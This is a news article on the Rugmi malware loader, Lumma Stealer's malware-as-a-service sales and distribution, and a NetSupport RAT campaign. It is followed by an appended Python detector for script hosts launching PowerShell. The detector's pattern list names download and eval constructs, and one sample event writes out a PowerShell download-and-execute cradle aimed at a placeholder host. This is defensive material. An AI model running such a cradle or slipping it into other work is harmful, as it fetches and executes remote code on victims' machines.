
New Rugmi Malware Loader Surges with Hundreds of Daily Detections

Dec 28, 2023 | Newsroom | Malware / Cyber Threat


A new malware loader is being used by threat actors to deliver a wide range of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.

Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi.

"This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk," the company said in its Threat Report H2 2023.

Telemetry data gathered by the company shows that detections for the Rugmi loader spiked in October and November 2023, surging from single-digit daily numbers to hundreds per day.


Stealer malware is typically sold under a malware-as-a-service (MaaS) model to other threat actors on a subscription basis. Lumma Stealer, for instance, is advertised in underground forums for $250 a month. The most expensive plan costs $20,000, but it also gives buyers access to the source code and the right to sell it.

There is evidence to suggest that the codebase associated with the Mars, Arkei, and Vidar stealers has been repurposed to create Lumma.

Besides continually adapting its tactics to evade detection, the off-the-shelf tool is distributed through several methods ranging from malvertising to fake browser updates to cracked installations of popular software such as VLC media player and OpenAI ChatGPT.


Another technique concerns the use of Discord's content delivery network (CDN) to host and propagate the malware, as revealed by Trend Micro in October 2023.

This involves leveraging a combination of random and compromised Discord accounts to send direct messages to potential targets, offering them $10 or a Discord Nitro subscription in exchange for their help on a project.

Users who agree to the offer are then urged to download an executable file hosted on the Discord CDN that masquerades as iMagic Inventory but, in reality, contains the Lumma Stealer payload.

"Ready-made malware solutions contribute to the proliferation of malicious campaigns because they make the malware accessible even to potentially less technically skilled threat actors," ESET said.


"Offering a broader range of capabilities then serves to render Lumma Stealer even more attractive as a product."

The disclosures come as McAfee Labs disclosed a new variant of NetSupport RAT, which emerged from its legitimate progenitor NetSupport Manager and has since been put to use by initial access brokers to gather information and perform additional actions on victims of interest.

"The infection begins with obfuscated JavaScript files, serving as the initial point of entry for the malware," McAfee said, adding that it highlights the "evolving tactics employed by cybercriminals."

The execution of the JavaScript file advances the attack chain by running PowerShell commands to retrieve the remote control and stealer malware from an actor-controlled server. The campaign's primary targets include the U.S. and Canada.
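As an added example (not from the article, ESET or McAfee), a small detection run over constructed process-creation records: it flags the chain McAfee describes, a Windows script host launching PowerShell with a download-style command line. The script-host names, the PowerShell download indicators and the sample events are assumptions, not indicators published for this campaign.

```python
"""Flag a Windows script host spawning PowerShell with a download-style command line."""
import re
from dataclasses import dataclass

# Hosts that execute the obfuscated JavaScript stage (assumed).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell constructs typically used to pull a second stage (assumed indicators).
FETCH_PATTERN = re.compile(
    r"invoke-webrequest|downloadstring|downloadfile|net\.webclient"
    r"|\biwr\b|\birm\b|invoke-expression|\biex\b",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the new process
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_suspicious(event: ProcessEvent) -> bool:
    """True when a script host starts PowerShell with a fetch/eval-style command line."""
    if _basename(event.parent_image) not in SCRIPT_HOSTS:
        return False
    if _basename(event.image) not in POWERSHELL:
        return False
    return bool(FETCH_PATTERN.search(event.command_line))


def find_suspicious(events):
    return [e for e in events if is_suspicious(e)]


# Constructed sample events, not real telemetry. Only the first matches the chain.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe", PS,
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://placeholder.invalid/stage2')\""),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcessEvent(r"C:\Windows\System32\cscript.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo done"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe", PS, "powershell.exe -Command Get-Date"),
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", hit.parent_image, "->", hit.image, "|", hit.command_line)
```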
